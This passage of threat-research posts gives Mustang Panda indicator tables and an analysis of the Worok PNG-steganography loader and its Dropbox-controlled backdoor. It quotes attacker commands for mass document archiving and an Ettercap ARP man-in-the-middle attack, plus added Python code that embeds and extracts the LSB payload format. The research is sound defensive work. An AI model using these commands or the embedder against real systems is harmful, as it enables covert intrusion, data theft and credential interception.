What was really surprising was the sheer scale of the compromise. We identified many high-profile government targets, some opposition entities and a few NGOs. It is worth noting that, given the sheer volume of data and the language barrier, we were only able to associate some of the victims with a specific organization. This means that the list of targets is likely incomplete and should be considered approximate. Nevertheless, the daily rate of gigabytes of exfiltrated data should give a strong hint of the scale of the operation.

Appendix

C&Cs

Folder | C&C | Notes
--- | --- | ---
DISK2 | 188.127.249[.]169 | Stealer
HT3 | 45.121.147[.]172 | Korplug
JSX | 103.169.90[.]132 | RAT
MG/MG44 | 23.106.122[.]81 | Remote shell
SE4/SE5/SE6/SE7 | 91.245.253[.]72, 193.42.36[.]214 | Backdoor (ZIPDLL.dll)
SEE | 103.91.66[.]116 | Backdoor (ZIPDLL.dll)
T3YK | 111.90.148[.]95 | Remote shell
U5_2 | 103.117.141[.]202 | RAT
YK51LOW | mod.mmgpms[.]com, txt.mm-film[.]com | Backdoor
1260M | 45.134.83[.]4 | Korplug
GDU1_NEW/GDU3 | https://github.com/YanNaingOo0072022/View2015 | Encrypted Google Drive token

Certificates and keys

A.1 JSX private key


A.2 JSX certificate


Side-loads

Archive | Binary | DLL
--- | --- | ---
BMD, YK41 | Symantec.exe | SHELLSEL.ocx
YK41LOW | GoogleUpdate.exe | SbieDll.dll
YK41LOW | atkexComSvcRes.exe | CefBrowser.dll
HT3 | x.exe | Vender.dll
GDU | Samvd.exe | SmadHook32.dll
GDUPIZ | vsgraphics.exe | vsgResources.dll
GDU1/GDU2 | CefSub.exe | CefBrowser.dll
GDU2/GDUPIZ/GDU1_NEW/GDU3 | piz.exe | vntfxf32.dll
GDU_OLD | AltTraceTool.exe | atltracetoolui.dll
GDU1_NEW/GDU3 | NitroPro.exe | CefBrowser.dll
GDU3 | piz.exe | FwcWsp.dll
WD | HP.exe | HPD.dll
DISK2/DISKM/MF2021188 | HPCustPartUI.exe | HPCustPartUI.dll
127C | OleView.exe | ACLUI.dll
KKL/KKL1 | mscorsvw.exe | mscorsvc.dll
MG/MG44 | dabs.ex/44.ex | SensorAware.dll
AUD | msync.ex | mcaltib.dll
CHR | browser.ex | browser_elf.dll
T3YK | ygfdt.exe | corecrl.dll
UC | melt_64.exe | libmlt-6.dll
1260M | upservice.exe | breakpad.dll
U5_2 | HPCustPartUI.exe | HPCustPartUI.dll
U5_2 | PlugInInstallerUtility2.exe | PlugInInstallLib.exe
SE1 | FacialFeatureDemo.exe | facesdk.dll
SE1/SE3/SE4/SE5/SE6/SE7/SEE | CUZ.exe | ZIPDLL.dll
SE1 | %volume_drive%.exe | MSFTEDIT.dll
SE1/SE7 | GUP.exe | libcurl.dll
SE1 | spoololk.exe | WNTFXF32.dll
SE3/SE4/SE5/SE6/SEE | vivaldi.exe | vivaldi_elf.dll
SE6/SE7 | wsc_proxy.exe | wsc.dll

File hashes

The post Hitching a ride with Mustang Panda appeared first on Avast Threat Labs.

PNG Steganography Hides Backdoor

10 November 2022 at 12:15

Our fellow researchers from ESET published an article about previously undocumented tools infiltrating high-profile companies and local governments in Asia. The tools, active since at least 2020, are designed to steal data. ESET dubbed them Worok. ESET observed a significant break in activity from May 5, 2021 to the beginning of 2022. Nevertheless, when Worok became active again, new targeted victims – including energy companies in Central Asia and public sector entities in Southeast Asia – were infected to steal data based on the type of the attacked companies.

The researchers from ESET described two execution chains and how victims’ computers are compromised. The initial compromise is unknown, but the next stages are described in detail, including how the final payload is loaded and extracted via steganography from PNG files. However, the final payload has not been recovered yet. Detailed information about Worok, the chains, and the backdoor commands can be found in ESET’s article Worok: The big picture.

Our analysis aims to extend the current knowledge from ESET’s research. We have captured additional artifacts related to Worok at the end of the execution chain. The PNG files captured by our telemetry confirm that the purpose of the final payload embedded in them is data stealing. What is noteworthy is the data collection from victims’ machines using a DropBox repository, as well as the attackers using the DropBox API for communication with the final stage.

Compromise Chain

We intend to remain consistent with the terminology set by ESET’s research. Our research also has not uncovered the whole initial compromise of the malware. However, we have a few new observations that can be part of the infiltration process.

Figure 1 illustrates the original compromise chain described by ESET. In some cases, the malware is supposedly deployed by attackers via ProxyShell vulnerabilities. In some corner cases, exploits against the ProxyShell vulnerabilities were used for persistence in the victim’s network. The attackers then used publicly available exploit tools to deploy their custom malicious kits. So, the final compromise chain is straightforward: the first stage is CLRLoader which implements a simple code that loads the next stage (PNGLoader), as reported by ESET.

Figure 1. Worok compromise chain

Initial Compromise

The specific initial attack vector is still unknown, but we found four DLLs containing the code of CLRLoader on compromised machines. Our detections captured the process tree illustrated in Figure 2.

Figure 2. Process tree running CLRLoader

This process tree was observed for WLBSCTRL.DLL, TSMSISrv.DLL, and TSVIPSrv.DLL. The common parent process executing the DLLs is svchost -k netsvcs, so the initial process is SvcHost hosting a Windows service. The DLL file names let us identify two Windows services, namely IKE and AuthIP IPsec Keying Modules (IKEEXT) and Remote Desktop Configuration (SessionEnv). Both services are known to be exposed to DLL hijacking because the DLL files they load are missing from the System32 folder by default; see SCM and DLL Hijacking Primer.

Lateral movement

The DLL hijacking in the System32 folder is not a vulnerability by itself, because the attackers need administrator privileges to write into it. However, we assume that a reverse shell with administrator privileges exists as a consequence of the initial compromise. In that case, the attacker can efficiently perform lateral movement via the Service Control Manager (SVCCTL).

In short, the attackers place the hijacked DLL files into %SYSTEMROOT%\System32 and then start an appropriate service remotely. 

List of abused Windows services and their DLL files:

  • IKE and AuthIP IPsec Keying Modules
    • C:\Windows\System32\WLBSCTRL.dll
  • Remote Desktop Configuration
    • C:\Windows\System32\TSMSISrv.dll
    • C:\Windows\System32\TSVIPSrv.dll

The second observed DLL hijack is related to VMware machines. The attackers can misuse the hijacking of vmGuestLib.dll, which is used by the WMI Performance Adapter (WmiApSrv) service to provide performance information.

On system start, WmiApSrv loads vmStatsProvider.dll, which tries to load vmGuestLib.dll from %ProgramFiles%\VMware\VMware Tools\vmStatsProvider\win32 first. However, the original library is located in %SYSTEMROOT%\System32. Hence, if the attackers place vmGuestLib.dll into the %ProgramFiles% location, this also leads to DLL hijacking.

These two approaches are probable scenarios of how CLRLoader is executed and the compromise chain shown in Figure 1 launched. The elegance of this approach is that the attackers do not have to create a new service that might reveal suspicious activity. The attackers abuse only the export functions of the hijacked DLLs, whose empty reimplementation does not cause an error or any other indicator of compromise. Moreover, the persistence of CLRLoader is ensured by the legitimate Windows services.

CLRLoader

CLRLoader is a DLL file written in Microsoft Visual C++. It implements the DllMain method, which is responsible for loading the next stage (the .NET variant of PNGLoader). The remaining exported functions correspond to the interfaces of the hijacked DLLs, but their implementation is empty, so invoking them does not crash the calling processes. For completeness, the hijacked files also contain the digital signatures of the original DLL files; naturally, the signatures are invalid.

CLRLoader is activated by a call to LoadLibraryExW from the abused process/service. LoadLibraryExW is called with the dwFlags parameter set to zero, so DllMain is invoked as soon as the malicious DLL is loaded into the virtual address space. An example of the CLRLoader code can be seen in Figure 3.

Figure 3. DllMain of hijacked DLL

CLRLoader checks the presence of the .NET DLL file containing PNGLoader, creates a mutex, and finally executes PNGLoader via CorBindToRuntimeEx API.

We recognized two variants of PNGLoader with the following entry points:

  • Jsprofile.Jspfilter (Setfilter)
  • pngpcd.ImageCoder (PngCoder)

PNGLoader

The second stage (PNGLoader) is loaded by CLRLoader or, as reported by ESET, by PowHeartBeat. We do not see any code deploying PNGLoader on infiltrated systems yet, but we expect to see it in a similar manner as the lateral movement.

PNGLoader is a loader that extracts bytes from PNG files and reconstructs them into executable code. PNGLoader is a .NET DLL file obfuscated with .NET Reactor; its file description mimics legitimate software such as Jscript Profiler or Transfer Service Proxy.

The deobfuscated PNGLoader code includes the entry point (Setfilter) invoked by CLRLoader. A hardcoded path, loader_path, is searched recursively for all PNG files. Each .png file is checked against specific bitmap attributes (height, width) and for steganographically embedded content (DecodePng). The Setfilter method is shown in Figure 4.

Figure 4. The Setfilter method of PNGLoader

The steganographic embedding relies on one of the most common steganographic techniques, least-significant bit (LSB) encoding. In general, this method embeds the data in the least-significant bits of every pixel. In this specific implementation, one pixel encodes a nibble (one bit in each of the alpha, red, green, and blue channels), i.e. two pixels carry one byte of hidden information, as illustrated in Figure 5. While this method is very easy to detect by simple statistical analysis, the change in pixel values is hardly perceivable by the naked eye.

Figure 5. Byte reconstruction from 2 pixels

The steganographically embedded content is then extracted in four steps as follows.

  • The first 16 bytes (32 pixels) of the PNG file are extracted, and the first 8 bytes must match a magic number. This check avoids the computational cost of pulling the remaining pixels (approx. hundreds of thousands) from a file that carries no payload. The following 8 bytes represent the length of the embedded payload.
  • The following bytes are the encrypted payload, which is in Gzip format once decrypted.
  • The extracted payload is decrypted using a multi-byte XOR key hard-coded in PNGLoader.
  • The result of the XOR is Gzip data, which is decompressed.

The result of these steps is the final payload steganographically embedded in the PNG file.
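The four extraction steps above, reimplemented for this article as an analyst's extractor together with the simple LSB statistic the text refers to (an added example, not PNGLoader's own code). It works on an in-memory list of RGBA pixels so it runs offline, and it assumes the nibble bit order (A, R, G, B from most to least significant), a high-nibble-first pixel pair, a little-endian length field and placeholder magic/XOR values; none of these come from the samples.

```python
import gzip
import struct
import zlib
from typing import List, Optional, Sequence, Tuple

Pixel = Tuple[int, int, int, int]  # (R, G, B, A), 8 bits each: PNG colour type 6

# Placeholder values. The real magic numbers and XOR key live in the PNGLoader
# samples (Figure 6) and are deliberately not reproduced here.
MAGIC = b"PNGLDR01"
XOR_KEY = bytes.fromhex("3a7f11c9")
HEADER_LEN = 16  # 8-byte magic + 8-byte payload length = 32 pixels


def nibble_from_pixel(px: Pixel) -> int:
    """One pixel carries one nibble: the LSB of each of A, R, G, B.
    Assumed bit order (most to least significant): A, R, G, B."""
    r, g, b, a = px
    return (a & 1) << 3 | (r & 1) << 2 | (g & 1) << 1 | (b & 1)


def extract_bytes(pixels: Sequence[Pixel], offset: int, count: int) -> bytes:
    """Rebuild `count` bytes from 2*count consecutive pixels starting at `offset`.
    The first pixel of each pair is assumed to hold the high nibble (Figure 5)."""
    if offset + 2 * count > len(pixels):
        raise ValueError("not enough pixels for the requested byte count")
    out = bytearray()
    for i in range(offset, offset + 2 * count, 2):
        out.append(nibble_from_pixel(pixels[i]) << 4 | nibble_from_pixel(pixels[i + 1]))
    return bytes(out)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Multi-byte XOR with a repeating key (symmetric, so it also encrypts)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_payload(pixels: Sequence[Pixel], magic: bytes = MAGIC,
                   key: bytes = XOR_KEY) -> Optional[bytes]:
    """Steps 1-4 from the text: header check, pull `length` bytes, XOR, gunzip.
    Returns None for a PNG without the magic or with an implausible length,
    so an innocent picture is rejected after reading only 32 pixels."""
    header = extract_bytes(pixels, 0, HEADER_LEN)
    if header[:8] != magic:
        return None
    (length,) = struct.unpack("<Q", header[8:])  # little-endian assumed
    if length == 0 or 2 * (HEADER_LEN + length) > len(pixels):
        return None
    encrypted = extract_bytes(pixels, 2 * HEADER_LEN, length)
    try:
        return gzip.decompress(xor_bytes(encrypted, key))
    except (OSError, EOFError, zlib.error):  # wrong key or corrupted stream
        return None


def lsb_ones_ratio(pixels: Sequence[Pixel], start: int, end: int) -> float:
    """Share of set LSBs over all four channels of pixels[start:end].
    Compressed and encrypted data drives this towards 0.5 (Figure 11), while the
    untouched part of the canvas keeps the cover image's own, structured bits."""
    bits = [c & 1 for px in pixels[start:end] for c in px]
    return sum(bits) / len(bits) if bits else 0.0


def constructed_cover(width: int, height: int) -> List[Pixel]:
    """Constructed test cover: a smooth gradient with every channel value even,
    i.e. an LSB plane that is all zeros (chosen to make the contrast obvious)."""
    return [((x * 4) % 256, (y * 8) % 256, 128, 254)
            for y in range(height) for x in range(width)]


def build_sample_image(payload: bytes, cover: Sequence[Pixel], magic: bytes = MAGIC,
                       key: bytes = XOR_KEY) -> List[Pixel]:
    """Constructed test input only: writes header + XOR'd gzip payload into the
    cover's LSBs using the same layout decode_payload expects."""
    blob = xor_bytes(gzip.compress(payload, mtime=0), key)
    data = magic + struct.pack("<Q", len(blob)) + blob
    if 2 * len(data) > len(cover):
        raise ValueError("payload does not fit into the cover")
    out = list(cover)
    nibbles = [n for byte in data for n in (byte >> 4, byte & 0xF)]
    for i, nib in enumerate(nibbles):
        r, g, b, a = out[i]
        out[i] = ((r & ~1) | (nib >> 2) & 1, (g & ~1) | (nib >> 1) & 1,
                  (b & ~1) | nib & 1, (a & ~1) | (nib >> 3) & 1)
    return out


if __name__ == "__main__":
    cover = constructed_cover(64, 8)
    img = build_sample_image(b"namespace Mydropbox { class Program { static void Main() {} } }", cover)
    print(decode_payload(img))
    print(f"LSB ones ratio, payload region: {lsb_ones_ratio(img, 32, 160):.2f}")
    print(f"LSB ones ratio, untouched tail: {lsb_ones_ratio(img, 400, 512):.2f}")
```

Feeding it a real PNG only needs the RGBA pixel list decoded by any image library; the ratio over the first few hundred pixels versus the tail of the canvas reproduces the Figure 11 observation that only the payload-sized prefix is randomised.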

Steganographically Embedded Payload

If PNGLoader successfully processes (extract → decode → unpack) the final payload, it is compiled at runtime and executed immediately. Our telemetry has picked up two variants of PNGLoader, working with the magic numbers recorded in Figure 6.

Figure 6. Data structure embedded in PNG bitmap

The first payload implementation is a PowerShell script, as demonstrated by the code fragment of PNGLoader in Figure 7. Like our ESET colleagues, we have no sample of this payload yet, but we expect a similar function as the second payload implementation described below.

Figure 7. Code fragment of PNGLoader executing the PowerShell payload

The second payload implementation is .NET C# source code, compiled and executed via the CompileAssemblyFromSource method of the CSharpCodeProvider class; see Figure 8.

Figure 8. Execution of C# payload embedded in PNG bitmap

The .NET C# payload has a namespace Mydropbox, class Program, and method Main. The namespace indicates that the payload operates with DropBox. Our telemetry captured a few PNG files, including the steganographically embedded C# payload.

PNG Files

At first glance, the PNG pictures look innocent, like a fluffy cloud; see Figure 9. Our telemetry has captured three PNG pictures with the following attributes:

  • Size: 1213 x 270 (px)
  • Bit Depth: 8, Color Type: 6 (RGB + Alpha)

Figure 9. Malicious PNG file with steganographically embedded C# payload

As we mentioned before, malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha). Let us have a look at their bit-planes. Figure 10 shows one of the higher bit planes for each color channel; notice that each of these images looks far from random noise. If we had a look at an image without data embedded in its LSB, we would usually see similar patterns.

Figure 10. One of the RGB bit-planes without hidden data

Now, to put it into contrast, let us have a look at LSB bit-planes. Figure 11 shows LSB bit-planes for every channel of the PNG image with the embedded encrypted (and compressed) payload. Recall that both encryption and compression should usually increase the entropy of the image. Therefore, it should be no surprise that LSB bit-planes of such an image look like random noise. It is evident that the whole canvas of LSB bit-planes is not used.

Figure 11. Zero (LSB) bit-planes of all channels with embedded data

The payload occupies only pixels representing the payload size, and the rest are untouched; see the algorithm below.

In this specific case, the PNG files are located in C:\Program Files\Internet Explorer, so the picture does not attract attention because Internet Explorer has a similar theme as Figure 12 shows.

Figure 12. Example of graphic Internet Explorer theme

DropBoxControl

At this time, we can extend the ESET compromise chain by the .NET C# payload that we call DropBoxControl – the third stage, see Figure 13.

Figure 13. Extended compromise chain

DropBoxControl is a backdoor that communicates with the attackers via the DropBox service. Notably, the C&C server is a DropBox account, and all communication, such as commands, uploads, and downloads, is performed using regular files in specific folders. Therefore, the backdoor commands are represented as files with a defined extension. DropBoxControl periodically checks the DropBox folder and executes commands based on the request files. The response to each command is also uploaded to the DropBox folder as a result file.

The text below describes the individual DropBoxControl components and the whole backdoor workflow.

DropBox API

DropBoxControl implements the DropBox communication using the standard API via HTTP/POST. There is a dedicated class, DropBoxOperation, wrapping the API with the methods summarized in Table 1. A DropBox API key, sent in the HTTP header, is hard-coded in the DropBoxControl sample but can be changed remotely.

DropBoxControl Method | API
--- | ---
DropBox_FileDownload | https://content.dropboxapi.com/2/files/download
DropBox_DataUpload | https://content.dropboxapi.com/2/files/upload
DropBox_FileDelete | https://api.dropboxapi.com/2/files/delete_v2
DropBox_GetFileList | https://api.dropboxapi.com/2/files/list_folder
Table 1. DropBox API implemented by DropBoxControl

Commands

The attackers control the backdoor through ten commands recorded in Table 2.

Command | Description
--- | ---
cmd | Run cmd /c <param> & exit; the param is sent by the attackers.
exe | Execute a defined executable with specific parameters.
FileUpload | Download data from the DropBox to a victim’s machine.
FileDownload | Upload data from a victim’s machine to the DropBox.
FileDelete | Delete data from a victim’s machine.
FileRename | Rename data on a victim’s machine.
FileView | Send file information (name, size, attributes, access time) about all of the victim’s files in a defined directory.
ChangeDir | Set the current directory for the backdoor.
Info | Send information about a victim’s machine to the DropBox.
Config | Update the backdoor configuration file; see Configuration.
Table 2. Backdoor commands

The Info command sends basic information about the infiltrated system:

  • ClientId hard-coded in each DropBoxControl sample
  • Version of the DropBoxControl sample (seen: 1.1.2.0001)
  • Hostname of the victim’s machine
  • List of all the victim’s IP addresses
  • Version and file size of explorer.exe
  • Windows architecture
  • List of hard drives, including total size, available free space, and drive type
  • Current time of the victim’s machine

Configuration

DropBoxControl, the object of this study, uses three files located in C:\Program Files\Internet Explorer. The file names are chosen to look legitimate within the Internet Explorer folder.

ieproxy.dat

This file contains the encrypted DropBoxControl configuration. It defines four variables:

  • DropboxId: API key used for authorization
  • Interval: how often the DropBox disk is checked
  • UpTime/DownTime: defines the time interval when the backdoor is active (seen 7 – 23)

An example of the (decrypted) configuration file content:
Bearer WGG0iGT****AAGkOdrimId9***QfzuwM-nJm***R8nNhy,300,7,23

iexplore.log

The iexplore.log file is the DropBoxControl log; it records most actions, such as contacting the DropBox, downloading/uploading files, and loading the configuration. Log entries are written only if a sqmapi.dat file exists. The logging engine is curiously implemented: the log file is not encrypted and contains the decrypted content of the ieproxy.dat file.

Encryption

DropBoxControl encrypts the configuration file (to no real effect, since the log leaks its plaintext) and the DropBox communication. The config file is encrypted using multi-byte XOR with a hard-coded key (owe01zU4). Although the API communication is protected by HTTPS, the data stored on the DropBox is additionally encrypted with the malware’s own algorithm.
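As an added example (not code from the report or from the malware), a small Python triage helper for the artifacts described in the Configuration and Encryption sections: it recovers the ieproxy.dat configuration with the hard-coded XOR key, applies the UpTime/DownTime gate used by the backdoor workflow, and pulls the same plaintext configuration out of iexplore.log, where the report notes it is leaked. The repeating-key XOR schedule, the inclusive start/exclusive end of the active window, and the placeholder token are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Hard-coded multi-byte XOR key for ieproxy.dat, as named in the report
XOR_KEY = b"owe01zU4"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The report says only 'multi-byte XOR'; the
    repeating key schedule is an assumption of this example."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


@dataclass
class DropBoxControlConfig:
    dropbox_id: str  # "Bearer <token>", the DropBox API key sent in the HTTP header
    interval: int    # how often the DropBox folder is checked (300 in the sampled config)
    up_time: int     # hour from which the backdoor is active (7 in the sampled config)
    down_time: int   # hour after which it goes idle (23 in the sampled config)


def parse_config(plaintext: str) -> DropBoxControlConfig:
    """Parse 'Bearer <token>,<Interval>,<UpTime>,<DownTime>'. Splitting from
    the right keeps any commas inside the key field intact."""
    token, interval, up, down = plaintext.strip().rsplit(",", 3)
    return DropBoxControlConfig(token, int(interval), int(up), int(down))


def decrypt_config(blob: bytes) -> DropBoxControlConfig:
    """Recover the configuration from XOR-encrypted ieproxy.dat content."""
    return parse_config(xor_bytes(blob, XOR_KEY).decode("utf-8"))


def in_work_time(hour: int, cfg: DropBoxControlConfig) -> bool:
    """UpTime/DownTime gate from the workflow section. Inclusive start and
    exclusive end are an assumption of this example."""
    return cfg.up_time <= hour < cfg.down_time


# iexplore.log entries look like "[HH:MM:SS]:[TAG]message"
LOG_LINE_RE = re.compile(r"^\[(\d\d:\d\d:\d\d)\]:\[([^\]]+)\]\s*(.*)$")


def parse_log(text: str):
    """Split iexplore.log into (time, tag, message) tuples, skipping other lines."""
    return [m.groups() for m in map(LOG_LINE_RE.match, text.splitlines()) if m]


def leaked_configs(entries):
    """The log records the decrypted config in '[__]DecryptContent is ...' lines,
    so the API key can be recovered from the log alone."""
    prefix = "DecryptContent is "
    return [parse_config(msg[len(prefix):])
            for _, tag, msg in entries if tag == "__" and msg.startswith(prefix)]


# Constructed sample data: placeholder token, not a real DropBox key
SAMPLE_PLAINTEXT = "Bearer EXAMPLE_TOKEN_PLACEHOLDER,300,7,23"
SAMPLE_IEPROXY_DAT = xor_bytes(SAMPLE_PLAINTEXT.encode(), XOR_KEY)
SAMPLE_LOG = """[02:00:50]:[+]Main starts.
[02:00:50]:[+]Config exists.
[02:00:50]:[__]DecryptContent is Bearer EXAMPLE_TOKEN_PLACEHOLDER,300,7,23
[10:39:40]:[+]In work time.
"""

if __name__ == "__main__":
    cfg = decrypt_config(SAMPLE_IEPROXY_DAT)
    print(cfg)
    print("active at 10h:", in_work_time(10, cfg), "| active at 2h:", in_work_time(2, cfg))
    print("leaked from log:", leaked_configs(parse_log(SAMPLE_LOG)))
```

With the 7 to 23 window from the sampled config, the appendix log is consistent: the backdoor starts at 02:00:50 and only reports "In work time" at 10:39:40.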

The data is encrypted using another hard-coded byte array (hexEnc), TaskId, and ClientId. Moreover, TaskId is used as an index to the hexEnc array, and the index is salted with ClientId in each iteration; see Figure 14. It is similar to the algorithm used by PowHeartBeat, as described in the ESET report.

Figure 14. Encryption algorithm used for DropBox files

DropBox Files

As mentioned above, the communication between the backdoors and the attackers is performed using DropBox files. In general, DropBox files that contain valuable information are encrypted. In addition to the data itself, each file also includes flags, the task type (command), and other metadata, as shown in Figure 15 and Table 3.

Figure 15. The file structure of DropBox files

Item       Length   Description
EncType    1        Flag – data in the file is encrypted
GzipType   1        Flag – data in the file is gzipped
TaskType   2        Command type
DataLen    4        Data length
Table 3. DropBox file header

Returning to the DropBox files, let us look at the folder structure of the DropBox account. The root folder contains folders named after the ClientId that is hard-coded in the DropBoxControl sample; more precisely, in the PNG file.

Each client folder holds a time.txt file containing a number that counts the backdoor iterations. One iteration means contacting and processing the corresponding client folder in the DropBox repository.

The attackers specify the task type and eventual parameters. The task type and parameters are then packed using the file header and uploaded into the appropriate client folder as a request file (.req). Further analysis found that the backdoor processes its .req files and creates a result file (.res) as a response for each request file. The result file has the same file structure shown in Figure 15, but data, data length, and task type have different values, since returned data contains requested (stolen) information.

Comparing all DropBox folders (Figure 16), we determined that request and result files are named in the form [0-9]+-[0-9]+. The filename is used for request/response identification and also for data encryption.

For example, let’s use the request file name 31-1233.req. The IDMessage is 31-1233 and TaskId is 1233. So, the data is encrypted using the ClientId and TaskId, plus hard-coded hexEnc; see Encryption.

Figure 16. List of DropBox files

DropBoxControl Workflow

We defined and described the basic functionality of DropBoxControl in the sections above. Therefore, we can summarize all this knowledge into a backdoor workflow and outline the whole process of data collecting, uploading, downloading, and communicating with the DropBox repository.

In the beginning, PNGLoader extracts the steganographically embedded DropBoxControl and invokes the Main method of the C# Mydropbox.Program class. DropBoxControl then decrypts and loads the configuration file containing the DropBox API key. Most of the actions are recorded in the log file.

If the current time is between UpTime and DownTime, DropBoxControl is active and starts its main functionality. It contacts the DropBox repository and uploads the time.txt file into the client folder. If the time.txt upload succeeds, the backdoor downloads a list of all files stored in the client folder. The file list is iterated, and each request (.req) file is downloaded and processed according to its task type (command). DropBoxControl executes the command and creates the result file (.res) with the requested information. The resulting encrypted file is uploaded back into the client folder. Finally, the processed request (.req) file is deleted.
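An added example (not from the report or from the malware) that parses a request/result file as the backdoor would encounter it in the client folder: the [0-9]+-[0-9]+ name gives IDMessage and TaskId, the Table 3 header gives the flags, task type and data length, and the appendix's task type values name the command. Little-endian field order, byte-sized header lengths and the constructed sample are assumptions; encrypted payloads are left opaque because the hexEnc algorithm of Figure 14 is not reproduced here.

```python
import gzip
import re
import struct
from dataclasses import dataclass

# Task type values from the report's appendix: requests are odd, responses even
TASK_TYPES = {
    0x01: "Cmd_Request", 0x02: "Cmd_Response",
    0x03: "Exe_Request", 0x04: "Exe_Response",
    0x05: "FileUpload_Request", 0x06: "FileUpload_Response",
    0x07: "FileDownload_Request", 0x08: "FileDownload_Response",
    0x09: "FileView_Request", 0x0A: "FileView_Response",
    0x0B: "FileDelete_Request", 0x0C: "FileDelete_Response",
    0x0D: "FileRename_Request", 0x0E: "FileRename_Response",
    0x0F: "ChangeDir_Request", 0x10: "ChangeDir_Response",
    0x11: "Info_Request", 0x12: "Info_Response",
    0x13: "Config_Request", 0x14: "Config_Response",
}

# Table 3 header: EncType(1) GzipType(1) TaskType(2) DataLen(4), followed by data.
# Little-endian field encoding is an assumption of this example.
HEADER = struct.Struct("<BBHI")

# Request/result names have the form [0-9]+-[0-9]+ plus a .req or .res suffix
FILENAME_RE = re.compile(r"^(\d+)-(\d+)\.(req|res)$")


@dataclass
class DropBoxFile:
    id_message: str   # e.g. "31-1233", pairs a request with its result
    task_id: int      # second number; also feeds the data encryption
    kind: str         # "req" (attacker request) or "res" (backdoor result)
    encrypted: bool   # EncType flag
    gzipped: bool     # GzipType flag
    task_type: int
    task_name: str
    data: bytes       # left as-is when encrypted (hexEnc scheme not reproduced)


def parse_filename(name: str):
    m = FILENAME_RE.match(name)
    if not m:
        raise ValueError(f"not a DropBoxControl request/result name: {name}")
    return f"{m.group(1)}-{m.group(2)}", int(m.group(2)), m.group(3)


def parse_dropbox_file(name: str, blob: bytes) -> DropBoxFile:
    id_message, task_id, kind = parse_filename(name)
    if len(blob) < HEADER.size:
        raise ValueError("truncated header")
    enc, gz, task_type, data_len = HEADER.unpack_from(blob)
    data = blob[HEADER.size:HEADER.size + data_len]
    if len(data) != data_len:
        raise ValueError(f"DataLen {data_len} exceeds file size {len(blob)}")
    if gz and not enc:            # only a plaintext payload can be inflated here
        data = gzip.decompress(data)
    return DropBoxFile(id_message, task_id, kind, bool(enc), bool(gz),
                       task_type, TASK_TYPES.get(task_type, "Unknown"), data)


def response_type_for(request_type: int) -> int:
    """Pairing visible in the appendix table: the response type is request + 1."""
    if request_type % 2 == 0 or request_type not in TASK_TYPES:
        raise ValueError(f"not a request task type: {request_type:#x}")
    return request_type + 1


def build_sample_request() -> bytes:
    """Constructed sample (not a real capture): an unencrypted, gzipped Cmd_Request."""
    payload = gzip.compress(b"ver")
    return HEADER.pack(0, 1, 0x01, len(payload)) + payload


SAMPLE_NAME = "31-1233.req"

if __name__ == "__main__":
    f = parse_dropbox_file(SAMPLE_NAME, build_sample_request())
    print(f)
    print("expected result type:", TASK_TYPES[response_type_for(f.task_type)])
```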

Victimology

The victims we saw targeted in this campaign are similar to those that ESET saw: companies and government institutions in Asia and North America, namely Mexico. Vietnam and Cambodia are the other countries affected by DropBoxControl. One of the DropBoxControl connections was observed from an IP address associated with the Ministry of Economic Development of Russia.

Discussion

The third stage of the compromise chain is represented by the C# implementation of DropBoxControl. The DropBoxControl functionality allows attackers to control and spy on victims’ machines. Moreover, the backdoor has access to the Program Files folder, so we expect it to run under administrator privileges. The most common command observed in log files is obtaining information about victims’ files, followed by data collecting.

Data collection is typically performed via the cmd command; see the example below:

rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\*.doc c:\\*.docx c:\\*.xls c:\\*.xlsx c:\\*.pdf c:\\*.ppt c:\\*.pptx c:\\*.jpg c:\\*.txt >nul

The attacks focus on collecting all files of interest, such as Word, Excel, PowerPoint, PDF, etc. They recursively search the files in the C:\ drive and pack them into an encrypted rar archive, split into multiple files.

Another command decrypted from the request file executes Ettercap, which sniffs live network connections using man-in-the-middle attacks; see the command below:

ettercap.exe -Tq -w a.cap -M ARP /192.168.100.99/ //

The attackers can sniff network communications and intercept user credentials sent via, e.g., web pages.

In short, DropBoxControl is malware with backdoor and spy functionality.

DropBox Account

Our telemetry has captured these three DropBox API keys:

Bearer gg706X***************Ru_43QAg**********1JU1DL***********ej1_xH7e
Bearer ARmUaL***************Qg02vynP**********ASEyQa***********deRLu9Gx
Bearer WGG0iG***************kOdrimId**********ZQfzuw***********6RR8nNhy

Two keys are registered to “Veronika Shabelyanova” (vershabelyanova1@gmail[.]com) with Chinese localization. The email is still active, as is the DropBox repository. The user name of the email is a Slavic transcription of “Вероника Шабелянова”.

The third DropBox repository is connected with a Hong Kong user “Hartshorne Yaeko” (yaekohartshornekrq11@gmai[l].com)

DropBox Files

We are monitoring the DropBox repositories and have already derived some remarkable information. The DropBox accounts were created on 11 July 2019, based on the README files created at account creation.

At this time, only one DropBox repository appears to be active. It contains seven folders with seven time.txt files, so there are seven active DropBoxControl instances, since the time.txt files hold integers that are periodically incremented; see DropBox Files. Moreover, the integer values indicate that the backdoors have been running continuously for tens of days. Regarding the backdoor commands, we guess the last activity that sent request files was on 1 June 2022, also for seven backdoors. Finally, the total number of folders, each representing an infiltrated machine, is twenty-one.

In April 2022, the attackers uploaded a Lua script that uses the nmap shortport library to search for Telnet services and s3270 to control IBM mainframes; see the script below.

Code Quality of DropBoxControl

While we usually refrain from commenting on the code quality, in this case it deserves mentioning as the code quality is debatable at best and not every objection can be blamed on obfuscation.

The code contains a lot of redundant code: both duplicate code and code that serves no function. An indication of unfamiliarity with C# is the use of the authors’ own serialization/deserialization methods instead of the C# built-in functions. The threading code does not rely on the usual synchronization primitives, such as semaphores or mutexes, but rather uses bool flags with periodic checks of thread states. The code also contains parts that are presumably copied from API documentation. For instance, the implementation of DropBox_FileDownload contains the same comment as the DropBox documentation; see the illustration below.

Another weird quirk is the encryption method for the configuration file. The DropBoxControl author has attempted to obfuscate the configuration in the ieproxy.dat file because the API key is sensitive information. However, when the config file is decrypted and applied, the configuration content is logged into the iexplore.log file in plain text.

